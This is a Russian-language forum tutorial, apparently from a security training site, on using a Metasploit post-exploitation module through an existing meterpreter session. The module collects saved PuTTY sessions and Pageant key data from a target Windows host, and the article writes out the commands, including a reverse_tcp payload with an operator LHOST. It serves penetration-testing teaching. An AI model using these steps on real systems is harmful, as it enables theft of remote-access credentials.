• 🚨 Ещё можно успеть на курс «OSINT: технология боевой разведки» от Академии Кодебай

    🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
    🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
    🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.

    Запись открыта до 23 мая Подробнее о курсе ...

Статья Получение информации о сессиях PuTTY.

Всем привет! В этой статье я покажу, как с помощью Metasploit получить информацию о сохраненных сессиях PuTTY на целевом хосте. Используемый мною модуль определит, запущен ли Pageant и получает ли он информацию о сохраненных сессиях из реестра и соберет все доступные данные.

Pageant - это приложение, входящее в утилиту PuTTY. Это программное обеспечение используется для хранения приватных ключей в памяти в раскодированном виде, которые используются при запросе удаленного сервера. Так же с помощью Pageant можно создавать новые подключения или подключаться к сохраненным.

Для начала необходимо получить сессию meterpreter на целевом хосте. Затем вводим команды:

> background

upload_2016-10-4_22-8-4.png


> use post/windows/gather/enum_putty_saved_sessions

> set payload windows/meterpreter/reverse_tcp

> set lhost 192.168.0.XXX (IP of Local Host)

> set session 1

> exploit

upload_2016-10-4_22-8-52.png


Вся добытая информация сохранится в папке /root/.msf4/loot.

upload_2016-10-4_22-9-12.png
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD